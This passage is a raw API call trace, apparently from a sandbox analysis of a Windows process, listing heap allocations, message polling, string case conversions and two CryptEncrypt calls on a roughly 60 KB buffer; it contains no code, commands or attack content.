(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0209.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0209.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0209.850] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0209.851] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.851] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.851] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.851] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.852] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0209.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0209.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0209.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0209.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0209.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0209.853] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.853] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0209.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.854] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0209.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.856] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0209.856] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0209.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab290, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.861] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xeb64, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xeb68) returned 1 [0209.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.861] CharLowerBuffW (in: lpsz="byte[60264]", cchLength=0xb | out: lpsz="byte[60264]") returned 0xb [0209.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.863] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.863] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.863] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xeb64, dwBufLen=0xeb68 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xeb68) returned 1 [0209.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.866] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.866] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.866] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.866] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, 